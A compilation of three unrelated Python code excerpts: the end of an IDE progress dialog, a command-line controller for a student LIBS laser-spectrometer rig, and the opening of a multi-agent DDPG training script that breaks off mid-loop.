self._cmd_id = cmd["id"]
description = cmd.get("description", " ")
self._description_label = ttk.Label(self.main_frame, text=description)
self._description_label.grid(row=0, column=0, padx=10, pady=10, sticky="new")
self._progress_bar = ttk.Progressbar(self.main_frame, mode=self._mode, length=200)
self._progress_bar.grid(row=1, column=0, padx=10, sticky="new")
self._progress_bar.start()
self._cancel_button = ttk.Button(
self.main_frame, text=tr("Cancel"), command=self._on_cancel
)
self._cancel_button.grid(row=2, column=0, padx=10, pady=10)
self._start_time = time.time()
if isinstance(cmd, InlineCommand):
get_workbench().bind("InlineResponse", self._on_response, True)
get_workbench().bind("InlineProgress", self._on_progress, True)
else:
raise NotImplementedError()
def _on_response(self, event):
self.response = event
if event.get("command_id") == self._cmd_id:
self.destroy()
def _on_progress(self, event):
if event.get("command_id") != self._cmd_id:
return
if self._mode == "indeterminate":
self._progress_bar.stop()
self._mode = "determinate"
self._progress_bar.configure(mode=self._mode)
if event.get("description"):
self._description_label.configure(text=event.get("description"))
self._progress_bar.configure(maximum=event["maximum"], value=event["value"])
def _send_interrupt(self):
self._sent_interrupt = True
self._description_label.configure(text="Cancelling...")
self._cancel_button.configure(text=tr("Close"))
get_runner()._cmd_interrupt()
def on_close(self, event=None):
self._on_cancel()
def _on_cancel(self):
if self._sent_interrupt:
if messagebox.askyesno(
"Interrupt again?",
"Do you want to close this dialog without waiting cancelling to complete?",
):
self.destroy()
else:
self._send_interrupt()
else:
if messagebox.askyesno(
"Cancel current operation?", "Do you really want to cancel this operation?"
):
self._send_interrupt()
def destroy(self):
get_workbench().unbind("InlineResponse", self._on_response)
get_workbench().unbind("InlineProgress", self._on_progress)
super().destroy()
def get_frontend_python():
# TODO: deprecated (name can be misleading)
warnings.warn("get_frontend_python is deprecated")
return get_interpreter_for_subprocess(sys.executable)
def get_interpreter_for_subprocess(candidate=None):
if candidate is None:
candidate = sys.executable
pythonw = candidate.replace("python.exe", "pythonw.exe")
if not _console_allocated and os.path.exists(pythonw):
return pythonw
else:
return candidate.replace("pythonw.exe", "python.exe")
|
libs_cli.py
|
#!/usr/bin/python3
"""
libs_cli.py
This is a command line interface to run a minimal LIBS test using an OceanOptics FLAME-T spectrometer and a 1064nm MicroJewel laser. This code is designed to be
run on a BeagleBone Black.
"""
import struct
import pathlib
import readline
import threading
from argparse import ArgumentParser
import time
import pickle
import platform
import serial
import binascii
import math
import seabreeze
seabreeze.use('cseabreeze') # Select the cseabreeze backend for consistency
from seabreeze.spectrometers import Spectrometer
from seabreeze.cseabreeze._wrapper import SeaBreezeError
if platform.system() == "Linux":
import Adafruit_BBIO.GPIO as GPIO
else:
from gpio_spoof import DummyGPIO as GPIO # This is for debugging purposes
from ujlaser.lasercontrol import Laser, LaserCommandError
running = True
verbose = False
spectrometer = None
laser = None
devices = []
command_log = None # File handle to the log file that we will store list of command queries
SD_CARD_PATH = './sample/' # needs to be set before testing
LOG_PATH = "logs/"
SAMPLES_PATH = "samples/"
# Global settings variables
laserSingleShot = True
sample_mode = "NORMAL"
external_trigger_pin = "P8_26"
integration_time = 6000
def check_laser(laser, complain=True):
"""Helper function that prints an error message if the laser has not been connected yet. Returns True if the laser is NOT connected."""
if laser == None:
if complain:
print_cli("!!! This command requires the laser to be connected! Use 'laser connect' first!")
return True
return False
def check_spectrometer(spec, complain=True):
"""Helper function that prints an error message if the spectrometer has not been connected yet. Returns True if the spectrometer is NOT connected."""
if spec == None:
if complain:
print("!!! This command requires the spectrometer to be connected! Use 'connect_spectrometer' first!")
return True
return False
def dump_settings_register(spec):
print_cli("... Dumping settings register:")
for i in (b'\x00', b'\x04', b'\x08', b'\x0C', b'\x10', b'\x14', b'\x18', b'\x28', b'\x2C', b'\x38', b'\x3C', b'\x40', b'\x48', b'\x50', b'\x54', b'\x74', b'\x78', b'\x7C', b'\x80'):
spec.f.raw_usb_bus_access.raw_usb_write(struct.pack(">ss",b'\x6B',i),'primary_out')
output = spec.f.raw_usb_bus_access.raw_usb_read(endpoint='primary_in', buffer_length=3)
print_cli((binascii.hexlify(i)).decode("ascii") + "\t" + (binascii.hexlify(output[1:])).decode("ascii"))
def query_settings(spec):
print_cli("Querying Spectrometer Settings...")
spec.f.raw_usb_bus_access.raw_usb_write(struct.pack(">s",b'\xFE'),'primary_out')
output = spec.f.raw_usb_bus_access.raw_usb_read(endpoint='primary_in', buffer_length=16)
pixel_count, integration_time, lamp_enable, trigger_mode, spectral_status, spectra_packets, power_down, packet_count, comm_speed = struct.unpack("<HI?BcB?BxxBx", output)
print_cli("Pixel Count: " + str(pixel_count))
print_cli("Integration_time: " + str(integration_time))
print_cli("Lamp Enable: " + str(lamp_enable))
print_cli("Trigger Mode: " + str(trigger_mode))
print_cli("Spectrum Status: " + str(spectral_status))
print_cli("Spectra packets: " + str(spectra_packets))
print_cli("Power Down Flags: " + str(power_down))
print_cli("Packet Count: " + str(packet_count))
print_cli("USB Speed: " + str(comm_speed))
def auto_connect_spectrometer():
"""Use seabreeze to autodetect and connect to a spectrometer. Returns a Spectrometer object on success, None otherwise"""
global devices
if devices == []:
devices = seabreeze.spectrometers.list_devices()
if devices != []:
try:
spec = seabreeze.spectrometers.Spectrometer(devices[0])
print_cli("*** Found spectrometer, serial number: " + spec.serial_number)
return spec
except SeaBreezeError as e:
print_cli("!!! " + str(e))
except:
print_cli("Unknown Error")
print_cli("!!! No spectrometer autodetected!")
def load_data(filename):
"""Prints the data in files. Not added in yet"""
with open(SD_CARD_PATH+filename, 'rb') as file:
data = pickle.load(file)
print_cli(data)
def save_sample_csv(filename, wavelengths, intensities):
debug_log("Saving sample as CSV: " + filename + "; len(wavelengths) = " + len(wavelengths) + ", len(intensities) = " + len(intensities))
with open(filename, "w") as f:
f.write("Wavelengths,Intensities\n")
for i in range(0,len(wavelengths)):
f.write(str(wavelengths)+","+str(intensities)+"\n")
f.close()
def user_select_port():
ports = serial.tools.list_ports.comports()
if len(ports) == 0:
print_cli("No serial ports detected!")
return
print_cli("\t0) Cancel")
for i,p in enumerate(ports):
print_cli("\t" + str(i+1) + ") " + str(p))
try:
i = input("Select a port or 0 to cancel: ")
log_input(i)
i = int(i)
except ValueError:
i = -1
if i == 0:
return
if i < 0 or i > len(ports):
print_cli("Invalid entry, please try again.")
return user_select_port()
else:
return ports[i-1].device
# Please use the below function when printing to the command line. This will both print to the command line and print it to the log file.
def cli_print(txt):
global command_log
command_log.write(str(int(time.time())) + ">: " + txt + "\n")
print(txt)
# This is a helper function because I'm REALLY lazy and don't feel like getting Python's runtime errors. I know this is an atrocity. Not sorry.
def print_cli(txt):
cli_print(txt)
# Print to the log file. Will print to CLI if verbose mode is enabled.
def debug_log(txt):
global command_log, verbose
command_log.write(str(time.time()) + "D:" + txt + "\n")
if verbose:
print("D: " + txt)
# Writes user input/commands to the command log file.
def log_input(txt):
global command_log
command_log.write(str(int(time.time())) + "?:" + txt + "\n")
def set_trigger_delay(spec, t):
"""Sets the trigger delay of the spectrometer. Can be from 0 to 32.7ms in increments of 500ns. t is in microseconds"""
global sample_mode
if sample_mode == "NORMAL":
software_trigger_delay = t
else:
t_nano_seconds = t * 1000 #convert micro->nano seconds
t_clock_cycles = t//500 # number of clock cycles to wait. 500ns per clock cycle b/c the clock runs at 2MHz
data = struct.pack("<ssH",b'\x6A',b'\x28',t_clock_cycles)
spec.f.raw_usb_bus_access.raw_usb_write(data,'primary_out')
# self.spec.f.spectrometer.set_delay_microseconds(t)
def set_external_trigger_pin(pin):
"""Sets the GPIO pin to use for external triggering."""
global external_trigger_pin
GPIO.setup(pin, GPIO.OUT)
external_trigger_pin = pin
def set_sample_mode(spec, mode):
global sample_mode
"""Sets the spectrometer sampling trigger to the specified mode."""
i = None
# TODO: Verify that these are the correct modes. The datasheets are vague.
# ^ should be correct for the seabreeze library v1.1.0 (at least 0 and 3 should be which are the ones that matter)
if mode == "NORMAL":
sample_mode = mode
i = 0
elif mode == "EXT_EDGE": #NOTE: EXT_EDGE and EXT_SYNC are not implemented here because the laser only has edge triggering
sample_mode = mode
i = 3
else:
print_cli("!!! Invalid mode!")
return False
try:
spec.trigger_mode(i)
print_cli("*** Spectrometer trigger mode set to " + mode + " (" + str(i) + ")")
return True
except SeaBreezeError as e:
print_cli("!!! " + str(e))
print_cli("!!! Spectrometer does not support mode number " + str(i) + " (" + mode + ")!")
return False
def set_integration_time(spec, time):
"""Sets the integration time of the spectrometer. Returns True on success, False otherwise."""
global integration_time
spec.integration_time_micros(time)
integration_time = time
print_cli("*** Integration time set to " + str(time) + " microseconds.")
return True
def do_trigger(pin):
GPIO.output(pin, GPIO.LOW)
time.sleep(0.01) # delay for spectrum, can be removed or edited if tested
GPIO.output(pin, GPIO.HIGH)
_wavelengths = None
_intensities = None
def _spectrometer_callback(spec):
global _wavelengths, _intensities
print_cli("Spectrometer callback")
_wavelengths, _intensities = spec.spectrum()
time.sleep(2)
def do_sample(spec, laser):
"""Performs a LIBS sample using the current spectrometer and laser settings."""
global sample_mode, _wavelengths, _intensities, integration_time
wavelengths = []
intensities = []
if sample_mode == "EXT_EDGE":
do_trigger(pin)
elif sample_mode == "NORMAL":
print_cli("Begninning sampling, clearing spectrometer FIFO...")
spec.integration_time_micros(6000) # Decrease integration time so we clear the FIFO faster
spec.spectrum()
spec.spectrum()
spec.spectrum()
print_cli("Setting integration time to " + str(integration_time) + "microseconds")
spec.integration_time_micros(integration_time)
time.sleep(0.5)
spectrometer_thread = threading.Thread(target=_spectrometer_callback, name="spec-sample-thread", args=(spectrometer,))
spectrometer_thread.start()
try:
laser.fire()
except LaserCommandError as e:
print_cli("!!! ERROR encountered while firing laser: " + str(e))
return None
spectrometer_thread.join()
#Yup, fire the laser during the integration period somehow
else: # no other modes planning to be used
print_cli("This mode is currently unavailable, please try EXT_EDGE or NORMAL mode.")
return
print_cli("Sample finished, saving data...")
timestamp = str(time.time()) # gets time immediately after integrating
data = _wavelengths, _intensities
with open(SAMPLES_PATH + str(timestamp) + "_SAMPLE.pickle", 'ab') as file:
pickle.dump(data, file)
print_cli("Sample saved.")
# Takes a sample from the spectrometer without the laser firing
def get_spectrum(spec):
wavelengths, intensities = spec.spectrum()
timestamp = time.time()
timestamp = str(timestamp)
data = wavelengths, intensities
filename = "SAMPLE_" + timestamp + ".pickle"
f = input("Save sample as [" + filename + "]:")
log_input(f)
if f != "":
filename = f
with open("samples/" + filename, 'ab') as file:
pickle.dump(data, file)
#save_sample_csv("samples/" + filename, wavelengths, intensities)
def give_status(spec, l):
"""Prints out a status report of the spectrometer and laser. Also saves the report to a file"""
s = "Status at: " + str(time.time()) + "\n"
if check_spectrometer(spec, False):
s += "Spectrometer is not connected.\n"
else:
s += "Spectrometer\n\t"
s += "Model-ID:\n\t"
s += "Spectrometer:\n\t"
s += "Sample Mode:\n"
s + "\n"
if check_laser(l, False):
s += "Laser is not connected.\n"
else:
s += "Laser:\n"
s += str(l.get_status())
cli_print(s)
def command_loop():
global running, spectrometer, laser, external_trigger_pin, laserSingleShot, sample_mode, integration_time
# make the below global variables? currently moved to here since it seems unnecessary
integration_time = 6000 # This is the default value the spectrometer is set to
mode = "NORMAL"
software_trigger_delay = 0 # delays laser firing time?? is this what it means?
while running:
c = input("?").strip() # Get a command from the user and remove any extra whitespace
log_input("?" + c)
parts = c.split() # split the command up into the command and any arguments
if c == "help": # check to see what command we were given
give_help()
elif c == "spectrometer spectrum":
if check_spectrometer(spectrometer):
continue
get_spectrum(spectrometer)
elif c == "spectrometer dump_registers":
if check_spectrometer(spectrometer):
continue
dump_settings_register(spectrometer)
elif c == "spectrometer query_settings":
if check_spectrometer(spectrometer):
continue
query_settings(spectrometer)
elif parts[0:3] == ["spectrometer","set","trigger_delay"]:
if check_spectrometer(spectrometer):
continue
if len(parts) < 4:
print_cli("!!! Invalid command: Set Trigger Delay command expects at least 1 argument.")
continue
try:
t = int(parts[3]) # t is the time in microseconds to delay
set_trigger_delay(spectrometer, t)
software_trigger_delay = t
except ValueError:
print_cli("!!! Invalid argument: Set Trigger Delay command expected an integer.")
continue
elif parts[0:3] == ["spectrometer","set","integration_time"]:
if check_spectrometer(spectrometer):
continue
if len(parts) < 4:
print_cli("!!! Invalid command: Set Integration Time command expects at least 1 argument.")
continue
try:
t = int(parts[3])
set_integration_time(spectrometer, t)
except ValueError:
print_cli("!!! Invalid argument: Set Integration Time command expected an integer!")
continue
except SeaBreezeError as e:
print_cli("!!! " + str(e))
continue
elif parts[0:3] == ["spectrometer","set","sample_mode"]:
if check_spectrometer(spectrometer):
continue
if len(parts) < 4:
print_cli("!!! Invalid command: Set Sample Mode command expects at least 1 argument.")
continue
if parts[3] == "NORMAL" or parts[3] == "EXT_LEVEL" or parts[3] == "EXT_SYNC" or parts[3] == "EXT_EDGE":
set_sample_mode(spectrometer, parts[3])
mode = parts[3]
else:
print_cli("!!! Invalid argument: Set Sample Mode command expected one of: NORMAL, EXT_SYNC, EXT_LEVEL, EXT_EDGE")
continue
elif c == "spectrometer get integration_time":
if check_spectrometer(spectrometer):
continue
print_cli("Spectrometer integration time set to " + str(integration_time) + " microseconds.")
continue
elif c == "status":
give_status(spectrometer, laser)
continue
elif parts[0:4] == ["set","external_trigger_pin"]:
if len(parts) < 3:
print_cli("!!! Invalid command: Set external trigger pin command expects at least 1 argument.")
continue
try:
pin = parts[2]
if not pin.startswith("P8_") or pin.startswith("P9_"):
raise ValueError("Invalid pin!")
set_external_trigger_pin(spectrometer, pin)
external_trigger_pin = pin
except:
cli_print("!!! " + pin + " is not a valid pin name! Should follow format such as: P8_22 or P9_16 (these are examples).")
continue
elif c == "get external_trigger_pin":
print_cli("External trigger pin is set to: " + external_trigger_pin)
continue
elif parts[0:3] == ["spectrometer","connect"]:
if len(parts) == 2:
spectrometer = auto_connect_spectrometer()
elif len(parts) == 3:
spectrometer = connect_spectrometer(parts[2])
elif c == "laser connect":
port = user_select_port()
if not port:
cli_print("!!! Aborting connect laser.")
continue
laser = Laser()
print_cli("Connecting to laser...")
laser.connect(port)
print_cli("Refreshing settings...")
laser.refresh_parameters()
s = laser.get_status()
if not s:
cli_print("!!! Failed to connect to laser!")
continue
cli_print("Laser Status:")
cli_print("ID: " + laser.get_laser_ID() + "\n")
cli_print(str(s))
print_cli("Rep rate: " + str(laser.repRate) + "Hz")
print_cli("Pulse width: " + str(laser.pulseWidth) + "s")
print_cli("Pulse mode: " + str(laser.pulseMode))
print_cli("Burst count: " + str(laser.burstCount))
elif c == "laser arm":
if check_laser(laser):
continue
try:
if laser.arm():
print_cli("*** Laser ARMED")
except LaserCommandError as e:
print_cli("!!! Error encountered while arming laser: " + str(e))
continue
elif c == "laser disarm":
if check_laser(laser):
continue
try:
if laser.disarm():
print_cli("*** Laser DISARMED")
except LaserCommandError as e:
print_cli("!!! Error encountered while disarming laser: " + str(e))
continue
elif c == "laser status":
if check_laser(laser):
print_cli("Laser is not connected.")
continue
s = laser.get_status()
print_cli(str(s))
print_cli("Rep rate: " + str(laser.repRate) + "Hz")
print_cli("Pulse width: " + str(laser.pulseWidth) + "s")
print_cli("Pulse mode: " + str(laser.pulseMode))
print_cli("Burst count: " + str(laser.burstCount))
elif c == "laser fire":
if check_laser(laser):
continue
laser.fire()
elif c == "laser stop":
if check_laser(laser):
continue
laser.emergency_stop()
elif parts[0:3] == ["laser","set","rep_rate"]: # TODO: Add check to see if this is within the repetition rate.
if check_laser(laser):
continue
if len(parts) < 4:
print_cli("!!! Set Laser Rep Rate expects a number argument!")
continue
try:
rate = float(parts[3])
if rate < 0:
raise ValueError("Repetition Rate must be positive!")
laser.set_repetition_rate(rate)
except ValueError:
print_cli("!!! Set Laser Rep Rate expects a positive float argument! You did not enter a float value!")
continue
except LaserCommandError as e:
print_cli("!!! Error encountered while commanding laser! " + str(e))
continue
elif parts[0:3] == ["laser", "get", "rep_rate"]:
if check_laser(laser):
continue
try:
r = laser.get_repetition_rate()
print_cli("Laser repetition rate set to: " + str(r) + "Hz")
except LaserCommandError as e:
print_cli("!!! Error encountered while commanding laser! " + str(e))
continue
elif parts[0:3] == ["laser", "get", "pulse_mode"]:
if check_laser(laser):
continue
try:
r = laser.get_pulse_mode()
s = "UNKOWN"
if r == 0:
s = "CONTINUOUS"
elif r == 1:
s = "SINGLE"
elif r == 2:
s = "BURST"
print_cli("Laser is set to fire in " + s + " mode.")
except LaserCommandError as e:
print_cli("!!! Error encountered while commanding laser! " + str(e))
continue
elif parts[0:3] == ["laser","set","pulse_mode"]:
if check_laser(laser):
continue
if len(parts) < 4:
print_cli("!!! Set Laser Pulse Mode expects one of the following arguments: CONTINUOUS, SINGLE, BURST!")
continue
else:
if parts[3] == "CONTINUOUS":
laser.set_pulse_mode(0)
laserSingleShot = True
elif parts[3] == "SINGLE":
laser.set_pulse_mode(1)
laserSingleShot = True
elif parts[3] == "BURST":
laser.set_pulse_mode(2)
laserSingleShot = False
elif parts[0:3] == ["laser","set","burst_count"]:
if check_laser(laser):
continue
if len(parts) < 4:
print_cli("!!! Set Laser Burst Count expects an integer argument!")
continue
if laser.pulseMode != 2:
print_cli("!!! Please set Laser Pulse Mode to BURST before setting the burst count!")
continue
try:
burst_count = int(parts[3])
if burst_count < 0:
raise ValueError("Burst Count must be positive!")
laser.set_burst_count(burst_count)
except ValueError:
print_cli("!!! Set Laser Burst Count expects a positive integer argument! You did not enter an integer.")
continue
elif parts[0:3] == ["laser", "get", "burst_count"]:
if check_laser(laser):
continue
try:
r = laser.get_burst_count()
print_cli("Laser set to " + str(r) + " pulses per sample")
except LaserCommandError as e:
print_cli("!!! Error encountered while commanding laser! " + str(e))
elif parts[0:3] == ["laser","set","pulse_width"]:
if check_laser(laser):
continue
if len(parts) < 4:
print_cli("!!! Set Laser Pulse Width expects a positive float argument!")
continue
try:
width = float(parts[3])
laser.set_pulse_width(width)
except ValueError:
print_cli("!!! Set Laser Pulse Width expects a float argument! You did not enter a float.")
continue
except LaserCommandError as e:
print_cli("!!! Error encountered while commanding laser! " + str(e))
continue
elif parts[0:3] == ["laser", "get", "pulse_width"]:
if check_laser(laser):
continue
try:
r = laser.get_pulse_width()
except LaserCommandError as e:
print_cli("!!! Error while commanding laser: " + str(e))
continue
if not r:
print_cli("!!! Error while querying the laser for pulse width!")
continue
print_cli("Laser pulse width is set to: " + str(r))
elif parts[0:3] == ["laser","get","fet_temp"]:
if check_laser(laser):
continue
t = laser.get_fet_temp()
print_cli("Laser FET temperature: " + str(t))
elif parts[0:3] == ["laser", "get", "shot_count"]:
shot_count = laser.get_system_shot_count()
print_cli("The laser shot count is at " + str(shot_count) + " shots.")
elif parts[0:3] == ["laser", "get", "diode_current"]:
diode_current = laser.get_diode_current()
print_cli("The laser's diode current is " + str(diode_current) + " Amps")
elif c == "do_libs_sample":
if check_laser(laser) or check_spectrometer(spectrometer):
continue
try:
do_sample(spectrometer, laser)
except SeaBreezeError as e:
print_cli("!!! " + str(e))
continue
except LaserCommandError as e:
print_cli("!!! Error while commanding laser! " + str(e))
elif c == "do_trigger":
do_trigger(external_trigger_pin)
print_cli("Triggered " + external_trigger_pin + ".")
elif c == "exit" or c == "quit":
if spectrometer:
spectrometer.close()
if laser:
laser.disconnect()
running = False
else:
print_cli("!!! Invalid command. Enter the 'help' command for usage information")
# Root commands allow the user to specify which instrument (laser or spectrometer) they are interacting with, or interact with other aspects of the program
ROOT_COMMANDS = ["help", "exit", "quit", "laser", "spectrometer", "set", "get", "status", "do_libs_sample", "do_trigger"]
# Actions are things that the user can do to the laser and spectrometer
SPECTROMETER_ACTIONS = ["spectrum", "set", "get", "connect", "status", "dump_registers", "query_settings"]
LASER_ACTIONS = ["connect", "status", "arm", "disarm", "fire", "set", "get", "stop"]
# Properties are things that can be get and/or set by the user
SPECTROMETER_PROPERTIES = ["sample_mode", "trigger_delay", "integration_time"]
LASER_PROPERTIES = ["diode_current", "fet_temp", "pulse_width", "rep_rate", "pulse_mode", "burst_count", "shot_count"]
ROOT_PROPERTIES = ["external_trigger_pin"]
def tab_completer(text, state):
text = readline.get_line_buffer()
parts = text.split(" ")
root = None
action = None
prop = None
if parts[0] in ROOT_COMMANDS:
root = parts[0]
if len(parts) > 1:
if root == "laser":
if parts[1] in LASER_ACTIONS:
action = parts[1]
elif root == "spectrometer":
if parts[1] in SPECTROMETER_ACTIONS:
action = parts[1]
elif root == "set":
root = None
action = "set"
elif root == "get":
root = None
action = "get"
if root == None:
if action == "get" or action == "set": # Getter and setter actions for root properties
if len(parts) < 2:
parts[1] = ""
for p in ROOT_PROPERTIES:
if p.startswith(parts[1]):
return p
else:
state -= 1
else:
for cmd in ROOT_COMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
elif not action and root == "laser":
if len(parts) < 2:
parts[1] = ""
for a in LASER_ACTIONS:
if a.startswith(parts[1]):
if not state:
return a
else:
state -= 1
elif not action and root == "spectrometer":
if len(parts) < 2:
parts[1] = ""
for a in SPECTROMETER_ACTIONS:
if a.startswith(parts[1]):
if not state:
return a
else:
state -= 1
elif action in ["get", "set"] and root == "laser":
if len(parts) < 3:
parts[2] = ""
for p in LASER_PROPERTIES:
if p.startswith(parts[2]):
if not state:
return p
else:
state -= 1
elif action in ["get", "set"] and root == "spectrometer":
if len(parts) < 3:
parts[2] = ""
for p in SPECTROMETER_PROPERTIES:
if p.startswith(parts[2]):
if not state:
return p
else:
state -= 1
else:
return
def laser_help(section = "root"):
print("Laser help section")
def spectrometer_help(section = "root"):
print("Spectrometer help section")
def give_help():
"""Outputs a list of commands to the user for use in interactive mode."""
print("\nInteractive Mode Commands")
def main():
global command_log, external_trigger_pin
parser = ArgumentParser(description="CLI for performing LIBS using an Ocean Optics FLAME-T spectrometer and a 1064nm Quantum Composers MicroJewel laser.",
epilog="Created for the 2020 NASA BIG Idea challenge, Penn State Oasis team. Questions: tylersengia@gmail.com",
prog="libs_cli.py")
parser.add_argument('--version', action='version', version='%(prog)s 0.1')
parser.add_argument("--spec-dev", "-s", help="Specify the USB device for the spectrometer. Default is autodetected by seabreeze.", nargs=1, default=None)
parser.add_argument("--laser-dev", "-l", help="Specify the USB device for the laser.", nargs=1, default=None)
parser.add_argument("--config", "-c", help="Read test configuration from the specified JSON file.", nargs=1, default=None)
parser.add_argument("--no-interact", "-n", help="Do not run in interactive mode. Usually used when a pre-written test configuration file is being used.", dest="interactive", action="store_false", default=True)
a = parser.parse_args()
command_log = open(LOG_PATH + "LOG_" + str(int(time.time())) + ".log", "w")
GPIO.setup(external_trigger_pin, GPIO.OUT)
GPIO.output(external_trigger_pin, GPIO.HIGH)
if a.interactive:
readline.parse_and_bind("tab: complete")
readline.set_completer(tab_completer)
command_loop()
GPIO.cleanup()
command_log.close()
if __name__ == "__main__":
main()
|
main_vec.py
|
import argparse
import math
from collections import namedtuple
from itertools import count
import numpy as np
from eval import eval_model_q
import copy
import torch
from ddpg_vec import DDPG
from ddpg_vec_hetero import DDPGH
import random
from replay_memory import ReplayMemory, Transition
from utils import *
import os
import time
from utils import n_actions, copy_actor_policy
from ddpg_vec import hard_update
import torch.multiprocessing as mp
from multiprocessing import Queue
from multiprocessing.sharedctypes import Value
import sys
parser = argparse.ArgumentParser(description='PyTorch REINFORCE example')
parser.add_argument('--scenario', required=True,
help='name of the environment to run')
parser.add_argument('--gamma', type=float, default=0.95, metavar='G',
help='discount factor for reward (default: 0.99)')
parser.add_argument('--tau', type=float, default=0.01, metavar='G',
help='discount factor for model (default: 0.001)')
parser.add_argument('--ou_noise', type=bool, default=True)
parser.add_argument('--param_noise', type=bool, default=False)
parser.add_argument('--train_noise', default=False, action='store_true')
parser.add_argument('--noise_scale', type=float, default=0.3, metavar='G',
help='initial noise scale (default: 0.3)')
parser.add_argument('--final_noise_scale', type=float, default=0.3, metavar='G',
help='final noise scale (default: 0.3)')
parser.add_argument('--exploration_end', type=int, default=60000, metavar='N',
help='number of episodes with noise (default: 100)')
parser.add_argument('--seed', type=int, default=9, metavar='N',
help='random seed (default: 4)')
parser.add_argument('--batch_size', type=int, default=1024, metavar='N',
help='batch size (default: 128)')
parser.add_argument('--num_steps', type=int, default=25, metavar='N',
help='max episode length (default: 1000)')
parser.add_argument('--num_episodes', type=int, default=60000, metavar='N',
help='number of episodes (default: 1000)')
parser.add_argument('--hidden_size', type=int, default=128, metavar='N',
help='number of episodes (default: 128)')
parser.add_argument('--updates_per_step', type=int, default=8, metavar='N',
help='model updates per simulator step (default: 5)')
parser.add_argument('--critic_updates_per_step', type=int, default=8, metavar='N',
help='model updates per simulator step (default: 5)')
parser.add_argument('--replay_size', type=int, default=1000000, metavar='N',
help='size of replay buffer (default: 1000000)')
parser.add_argument('--actor_lr', type=float, default=1e-2,
help='(default: 1e-4)')
parser.add_argument('--critic_lr', type=float, default=1e-2,
help='(default: 1e-3)')
parser.add_argument('--fixed_lr', default=False, action='store_true')
parser.add_argument('--num_eval_runs', type=int, default=1000, help='number of runs per evaluation (default: 5)')
parser.add_argument("--exp_name", type=str, help="name of the experiment")
parser.add_argument("--save_dir", type=str, default="./ckpt_plot",
help="directory in which training state and model should be saved")
parser.add_argument('--static_env', default=False, action='store_true')
parser.add_argument('--critic_type', type=str, default='mlp', help="Supports [mlp, gcn_mean, gcn_max]")
parser.add_argument('--actor_type', type=str, default='mlp', help="Supports [mlp, gcn_max]")
parser.add_argument('--critic_dec_cen', default='cen')
parser.add_argument("--env_agent_ckpt", type=str, default='ckpt_plot/simple_tag_v5_al0a10_4/agents.ckpt')
parser.add_argument('--shuffle', default=None, type=str, help='None|shuffle|sort')
parser.add_argument('--episode_per_update', type=int, default=4, metavar='N',
help='max episode length (default: 1000)')
parser.add_argument('--episode_per_actor_update', type=int, default=4)
parser.add_argument('--episode_per_critic_update', type=int, default=4)
parser.add_argument('--steps_per_actor_update', type=int, default=100)
parser.add_argument('--steps_per_critic_update', type=int, default=100)
#parser.add_argument('--episodes_per_update', type=int, default=4)
parser.add_argument('--target_update_mode', default='soft', help='soft | hard | episodic')
parser.add_argument('--cuda', default=False, action='store_true')
parser.add_argument('--eval_freq', type=int, default=1000)
args = parser.parse_args()
if args.exp_name is None:
args.exp_name = args.scenario + '_' + args.critic_type + '_' + args.target_update_mode + '_hiddensize' \
+ str(args.hidden_size) + '_' + str(args.seed)
print("=================Arguments==================")
for k, v in args.__dict__.items():
print('{}: {}'.format(k, v))
print("========================================")
torch.set_num_threads(1)
device = torch.device("cuda:0" if torch.cuda.is_available() and args.cuda else "cpu")
env = make_env(args.scenario, None)
n_agents = env.n
env.seed(args.seed)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
num_adversary = 0
n_actions = n_actions(env.action_space)
obs_dims = [env.observation_space[i].shape[0] for i in range(n_agents)]
obs_dims.insert(0, 0)
if 'hetero' in args.scenario:
import multiagent.scenarios as scenarios
groups = scenarios.load(args.scenario + ".py").Scenario().group
agent = DDPGH(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, device, groups=groups)
eval_agent = DDPGH(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, 'cpu', groups=groups)
else:
agent = DDPG(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.actor_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, device)
eval_agent = DDPG(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.actor_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, 'cpu')
memory = ReplayMemory(args.replay_size)
feat_dims = []
for i in range(n_agents):
feat_dims.append(env.observation_space[i].shape[0])
# Find main agents index
unique_dims = list(set(feat_dims))
agents0 = [i for i, feat_dim in enumerate(feat_dims) if feat_dim == unique_dims[0]]
if len(unique_dims) > 1:
agents1 = [i for i, feat_dim in enumerate(feat_dims) if feat_dim == unique_dims[1]]
main_agents = agents0 if len(agents0) >= len(agents1) else agents1
else:
main_agents = agents0
rewards = []
total_numsteps = 0
updates = 0
exp_save_dir = os.path.join(args.save_dir, args.exp_name)
os.makedirs(exp_save_dir, exist_ok=True)
best_eval_reward, best_good_eval_reward, best_adversary_eval_reward = -1000000000, -1000000000, -1000000000
start_time = time.time()
copy_actor_policy(agent, eval_agent)
torch.save({'agents': eval_agent}, os.path.join(exp_save_dir, 'agents_best.ckpt'))
# for mp test
test_q = Queue()
done_training = Value('i', False)
p = mp.Process(target=eval_model_q, args=(test_q, done_training, args))
p.start()
for i_episode in range(args.num_episodes):
obs_n = env.reset()
env.render()
episode_reward = 0
episode_step = 0
agents_rew = [[] for _ in range(n_agents)]
while True:
# action_n_1 = [agent.select_action(torch.Tensor([obs]).to(device), action_noise=True, param_noise=False).squeeze().cpu().numpy() for obs in obs_n]
action_n = agent.select_action(torch.Tensor(obs_n).to(device), action_noise=True,
param_noise=False).squeeze().cpu().numpy()
next_obs_n, reward_n, done_n, info = env.step(action_n)
env.render()
total_numsteps += 1
episode_step += 1
terminal = (episode_step >= args.num_steps)
action = torch.Tensor(action_n).view(1, -1)
mask = torch.Tensor([[not done for done in done_n]])
next_x = torch.Tensor(np.concatenate(next_obs_n, axis=0)).view(1, -1)
